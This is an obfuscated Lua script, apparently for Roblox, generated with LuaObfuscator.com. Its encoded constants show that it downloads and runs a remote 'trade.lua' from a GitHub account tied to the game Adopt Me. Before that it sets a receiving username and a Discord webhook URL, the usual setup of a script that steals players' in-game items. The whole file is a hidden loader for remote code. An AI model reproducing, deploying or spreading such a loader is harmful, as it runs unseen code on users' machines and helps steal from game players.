--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v89=0;while true do if (v89==0) then v19=v0(v3(v30,1,1));return "";end end else local v90=v2(v0(v30,16));if v19 then local v112=0;local v113;while true do if (v112==1) then return v113;end if (v112==0) then v113=v5(v90,v19);v19=nil;v112=1;end end else return v90;end end end);local function v20(v31,v32,v33) if v33 then local v91=(v31/(2^(v32-1)))%((5 -3)^(((v33-(2 -1)) -(v32-(1 -(0 + 0)))) + (2 -1))) ;return v91-(v91%(620 -(555 + 64))) ;else local v92=(933 -(857 + 74))^(v32-(1 + 0)) ;return (((v31%(v92 + v92))>=v92) and (569 -((1244 -(282 + 595)) + 201))) or (927 -(214 + 713)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1639 -(1523 + 114)) );v18=v18 + 2 + 0 ;return (v36 * 256) + v35 ;end local function v23() local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(1 -0)) then return (v41 * (16778281 -(68 + 997))) + (v40 * ((48988 + 17818) -(226 + 1044))) + (v39 * (1114 -858)) + v38 ;end if (v37==(117 -(32 + 85))) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (9 -5) ;v37=1;end end end local function v24() local v42=0 + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(11 -8)) then if (v47==(952 -(802 + 150))) then if (v46==((0 + 0) -0)) then return v48 * (0 -0) ;else local v121=0 + 0 ;while true do if (v121==(997 -(915 + 82))) then v47=2 -1 ;v45=0;break;end end end elseif (v47==(1677 + 370)) then return ((v46==(0 + 0)) and (v48 * ((1 -(772 -(201 + 571)))/0))) or (v48 * NaN) ;end return v8(v48,v47-(2210 -(1069 + 118)) ) * (v45 + (v46/((1140 -(116 + 1022))^(117 -(270 -205))))) ;end if (v42==2) then v47=v20(v44,(27 + 18) -(87 -63) ,6 + 25 );v48=((v20(v44,56 -24 )==((3 -2) + 0)) and  -((1651 -(814 + 45)) -(368 + 423))) or (3 -(4 -2)) ;v42=21 -(10 + 8) ;end if (v42==(3 -2)) then v45=443 -(23 + 393 + 26) ;v46=(v20(v44,3 -2 ,9 + 11 ) * (2^(56 -24))) + v43 ;v42=440 -(145 + 293) ;end if (v42==(430 -(16 + 28 + 386))) then v43=v23();v44=v23();v42=1487 -(998 + 488) ;end end end local function v25(v49) local v50;if  not v49 then local v93=885 -(261 + 624) ;while true do if (v93==(0 -(0 -0))) then v49=v23();if (v49==(1080 -(1020 + 60))) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v67=1424 -(630 + 793) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v94,v95,v96,v97,v98,v99,v100,v101,v102) local v103=(function() return 0 -0 ;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do if (v103==(0 + 0)) then local v119=(function() return 0;end)();while true do if (v119~=1) then else v103=(function() return 2 -1 ;end)();break;end if (v119~=0) then else v94=(function() return 0;end)();v95=(function() return nil;end)();v119=(function() return 1;end)();end end end if (1~=v103) then else local v120=(function() return 0;end)();while true do if (v120==0) then while true do if (v94~=0) then else v95=(function() return v96();end)();if (v97(v95, #"}", #"}")==0) then local v160=(function() return 0 -0 ;end)();local v161=(function() return;end)();local v162=(function() return;end)();local v163=(function() return;end)();local v164=(function() return;end)();while true do if (v160==0) then local v187=(function() return 0;end)();while true do if (v187~=1) then else v160=(function() return 1;end)();break;end if (v187==(867 -(550 + 317))) then v161=(function() return 0 -0 ;end)();v162=(function() return nil;end)();v187=(function() return 1 -0 ;end)();end end end if (v160~=(5 -3)) then else while true do if (v161~= #"{") then else local v194=(function() return 0;end)();while true do if (v194==(286 -(134 + 151))) then v161=(function() return 1667 -(970 + 695) ;end)();break;end if (v194==(0 -0)) then v164=(function() return {v98(),v98(),nil,nil};end)();if (v162==(0 -0)) then local v201=(function() return 0 -0 ;end)();local v202=(function() return;end)();while true do if (v201==0) then v202=(function() return 0 -0 ;end)();while true do if (v202==0) then v164[ #"19("]=(function() return v98();end)();v164[ #"0836"]=(function() return v98();end)();break;end end break;end end elseif (v162== #",") then v164[ #"xnx"]=(function() return v99();end)();elseif (v162==(1826 -(1195 + 629))) then v164[ #"nil"]=(function() return v99() -(2^(20 -4)) ;end)();elseif (v162== #"19(") then local v209=(function() return 0;end)();local v210=(function() return;end)();while true do if (v209==(241 -(187 + 54))) then v210=(function() return 780 -(162 + 618) ;end)();while true do if (v210~=(0 + 0)) then else v164[ #"xxx"]=(function() return v99() -((2 + 0)^(33 -17)) ;end)();v164[ #".com"]=(function() return v98();end)();break;end end break;end end end v194=(function() return 1 -0 ;end)();end end end if (v161~= #"-19") then else if (v97(v163, #"-19", #"gha")== #" ") then v164[ #"0313"]=(function() return v100[v164[ #"?id="]];end)();end v101[v102]=(function() return v164;end)();break;end if (v161~=(1 + 1)) then else local v196=(function() return 1636 -(1373 + 263) ;end)();local v197=(function() return;end)();while true do if (v196==0) then v197=(function() return 1000 -(451 + 549) ;end)();while true do if (v197==(0 + 0)) then if (v97(v163, #"\\", #"|")~= #"]") then else v164[2 -0 ]=(function() return v100[v164[2 -0 ]];end)();end if (v97(v163,2,1386 -(746 + 638) )== #"<") then v164[ #"xxx"]=(function() return v100[v164[ #"91("]];end)();end v197=(function() return 1;end)();end if (v197~=(1 + 0)) then else v161=(function() return  #"-19";end)();break;end end break;end end end if (v161~=0) then else local v198=(function() return 0 -0 ;end)();local v199=(function() return;end)();while true do if (v198~=0) then else v199=(function() return 0;end)();while true do if (v199==(342 -(218 + 123))) then v161=(function() return  #"<";end)();break;end if (v199==(1581 -(1535 + 46))) then v162=(function() return v97(v95,2 + 0 , #"nil");end)();v163=(function() return v97(v95, #"asd1",6);end)();v199=(function() return 1;end)();end end break;end end end end break;end if (v160~=(1 + 0)) then else local v188=(function() return 560 -(306 + 254) ;end)();while true do if (v188~=(1 + 0)) then else v160=(function() return 2;end)();break;end if (v188~=(0 -0)) then else v163=(function() return nil;end)();v164=(function() return nil;end)();v188=(function() return 1;end)();end end end end end break;end end return v94,v95,v96,v97,v98,v99,v100,v101,v102;end end end end end;end)();local v53=(function() return function(v104,v105,v106) local v107=(function() return 0;end)();local v108=(function() return;end)();while true do if (v107==0) then v108=(function() return 0;end)();while true do if (v108==(1467 -(899 + 568))) then local v122=(function() return 0 + 0 ;end)();while true do if (v122==(0 -0)) then v104[v105-#"|" ]=(function() return v106();end)();return v104,v105,v106;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"<",v58 do local v70=(function() return 0;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v70==0) then v71=(function() return v21();end)();v72=(function() return nil;end)();v70=(function() return 604 -(268 + 335) ;end)();end if (v70==1) then if (v71== #":") then v72=(function() return v21()~=(290 -(60 + 230)) ;end)();elseif (v71==2) then v72=(function() return v24();end)();elseif (v71== #"19(") then v72=(function() return v25();end)();end v59[v69]=(function() return v72;end)();break;end end end v57[ #"91("]=(function() return v21();end)();for v73= #"{",v23() do FlatIdent_1076E,Descriptor,v21,v20,v22,v23,v59,v54,v73=(function() return v52(FlatIdent_1076E,Descriptor,v21,v20,v22,v23,v59,v54,v73);end)();end for v74= #"{",v23() do v55,v74,v28=(function() return v53(v55,v74,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[573 -(426 + 146) ];local v65=v61[(1995 -(826 + 46)) -((1065 -(245 + 702)) + 1003) ];local v66=v61[(3 -2) + 2 ];return function(...) local v75=v64;local v76=v65;local v77=v66;local v78=v27;local v79=1457 -(91 + 191 + (3072 -(260 + 1638))) ;local v80= -(812 -(569 + 242));local v81={};local v82={...};local v83=v12("#",...) -(1 + 0) ;local v84={};local v85={};for v109=0,v83 do if ((3769>=1173) and (v109>=v77)) then v81[v109-v77 ]=v82[v109 + (2 -1) ];else v85[v109]=v82[v109 + 1 + 0 ];end end local v86=(v83-v77) + (1025 -(706 + 318)) ;local v87;local v88;while true do v87=v75[v79];v88=v87[1252 -(721 + 530) ];if (v88<=(1281 -(945 + 326))) then if ((1485==1485) and (v88<=(9 -5))) then if (v88<=(1 + 0)) then if (v88>(0 + 0)) then v85[v87[2]]();else v85[v87[702 -(271 + 429) ]]=v63[v87[3 + 0 ]];end elseif ((v88<=(4 -2)) or (3315<=2782)) then if (v85[v87[(1942 -(382 + 58)) -(1408 + 92) ]]==v87[1090 -(461 + (2005 -1380)) ]) then v79=v79 + (1289 -(993 + 295)) ;else v79=v87[1 + 0 + (3 -1) ];end elseif (v88>(1174 -(418 + 753))) then v85[v87[9 -7 ]]();else v63[v87[2 + 1 ]]=v85[v87[1 + 1 ]];end elseif (v88<=(3 + 4)) then if (v88<=(2 + 3)) then v85[v87[531 -((1206 -800) + 123) ]]=v87[(2977 -(902 + 303)) -(1749 + 20) ];elseif (v88==(1208 -(373 + 829))) then local v140=(0 -0) + 0 ;local v141;while true do if (v140==(1322 -(1249 + 73))) then v141=v87[(4 -2) + 0 ];v85[v141]=v85[v141](v13(v85,v141 + 1 + 0 ,v80));break;end end else v85[v87[3 -(1 + 0) ]]=v87[1148 -(466 + 679) ];end elseif (v88<=(19 -11)) then do return;end elseif ((4279>=2882) and (v88>(25 -16))) then local v144=1900 -((1796 -(1121 + 569)) + 1794) ;local v145;local v146;local v147;local v148;while true do if (v144==(2 -0)) then for v189=v145,v80 do v148=v148 + 1 + 0 ;v85[v189]=v146[v148];end break;end if (v144==(1 + 0)) then v80=(v147 + v145) -(2 -1) ;v148=(214 -(22 + 192)) -0 ;v144=685 -(483 + 200) ;end if ((v144==(114 -((1467 -(1404 + 59)) + 110))) or (2029>=3521)) then v145=v87[2 + 0 ];v146,v147=v78(v85[v145](v13(v85,v145 + (585 -(57 + 527)) ,v87[1430 -(41 + 1386) ])));v144=1;end end else v85[v87[105 -(17 + 86) ]]=v63[v87[3]];end elseif ((v88<=(11 + 4)) or (876>=2964)) then if ((v88<=(26 -14)) or (2037>=4642)) then if ((1720<4458) and (v88==(1591 -(1183 + 397)))) then if (v85[v87[5 -3 ]]==v87[4]) then v79=v79 + (167 -(122 + 44)) ;else v79=v87[5 -2 ];end else local v127=0 -(0 -0) ;local v128;local v129;local v130;local v131;while true do if (v127==(0 + 0)) then v128=v87[1977 -(1913 + 62) ];v129,v130=v78(v85[v128](v13(v85,v128 + 1 + 0 ,v87[1 + 2 ])));v127=(1 -0) -0 ;end if ((v127==(7 -(770 -(468 + 297)))) or (436>3021)) then for v170=v128,v80 do local v171=1661 -(1477 + 184) ;while true do if (v171==(65 -(30 + 35))) then v131=v131 + 1 + 0 ;v85[v170]=v129[v131];break;end end end break;end if (v127==(1 + 0)) then v80=(v130 + v128) -(1258 -(1043 + 214)) ;v131=0 -(562 -(334 + 228)) ;v127=7 -5 ;end end end elseif ((713<=847) and ((v88<=((1069 -752) -(244 + (139 -79)))) or (2232>2497))) then v79=v87[1215 -(323 + 889) ];elseif (v88==14) then local v152=476 -(41 + 435) ;local v153;local v154;while true do if ((2154<=4031) and (v152==(0 -0))) then v153=v87[582 -(361 + 219) ];v154=v85[v87[323 -(53 + 267) ]];v152=1 + 0 ;end if ((1 + 0)==v152) then v85[v153 + (414 -(15 + 398)) ]=v154;v85[v153]=v154[v87[986 -(18 + 964) ]];break;end end else do return;end end elseif ((4615==4615) and ((v88<=(12 + 6)) or (2110<=332))) then if ((v88<=(60 -44)) or (3790==500)) then v63[v87[270 -((318 -142) + 91) ]]=v85[v87[4 -2 ]];elseif ((89<221) and (3686>3172) and (v88==(10 + 7))) then for v166=v87[2 + 0 ],v87[853 -(20 + 830) ] do v85[v166]=nil;end else local v155=0 + 0 ;local v156;local v157;while true do if (v155==(1875 -(157 + 1718))) then v156=v87[2 + 0 ];v157=v85[v87[129 -(116 + 10) ]];v155=1 + 0 ;end if ((2054>=1421) and (v155==(739 -(154 + 388 + 196)))) then v85[v156 + (1 -0) ]=v157;v85[v156]=v157[v87[8 -4 ]];break;end end end elseif ((692<3058) and (v88<=(6 + (249 -(141 + 95))))) then v79=v87[2 + 0 + 1 ];elseif (v88==(8 + 12)) then for v168=v87[4 -2 ],v87[7 -4 ] do v85[v168]=nil;end else local v158=1227 -(322 + 905) ;local v159;while true do if ((v158==(1551 -(1126 + 425))) or (4474<820)) then v159=v87[(1047 -640) -((283 -165) + 287) ];v85[v159]=v85[v159](v13(v85,v159 + (1190 -(449 + 740)) ,v80));break;end end end v79=v79 + (3 -2) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4861726447616D6553732F41646F70744D652F6D61696E2F74726164652E6C756103083O00557365724E616D65030C3O00616C746F66736861646F773303073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313237323834363338343835323336393435382F6844765732446662436F5F4E6D746B6C7363777A7430734274696B7959466B7379504345786C7361716E4E66356F7A4D616F4A6B69643266684237577A69374C6C507954001A3O0012053O00014O0014000100013O00260B3O00020001000100040D3O00020001001205000100013O00260B0001000F0001000200040D3O000F000100122O000200033O00122O000300043O002012000300030005001205000500064O000C000300054O001500023O00022O000100020001000100040D3O0019000100260B000100050001000100040D3O00050001001205000200083O001210000200073O0012050002000A3O001210000200093O001205000100023O00040D3O0005000100040D3O0019000100040D3O000200012O000F3O00017O00",v9(),...);
